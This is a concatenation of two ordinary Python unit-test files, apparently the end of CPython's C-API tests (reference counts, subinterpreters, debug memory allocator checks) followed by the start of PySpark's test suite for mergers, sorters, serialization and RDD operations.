subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
from platform import python_implementation
if sys.version_info[:2] <= (2, 6):
import unittest2 as unittest
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class TestMerger(unittest.TestCase):
def setUp(self):
self.N = 1 << 16
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class TestSorter(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class TestCheckpoint(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class TestAddFile(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
class TestRDDFunctions(PySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.sc.stop()
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
self.sc = SparkContext("local")
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
m = self.sc.parallelize(range(1), 1).map(lambda x: len(data)).sum()
self.assertEquals(N, m)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
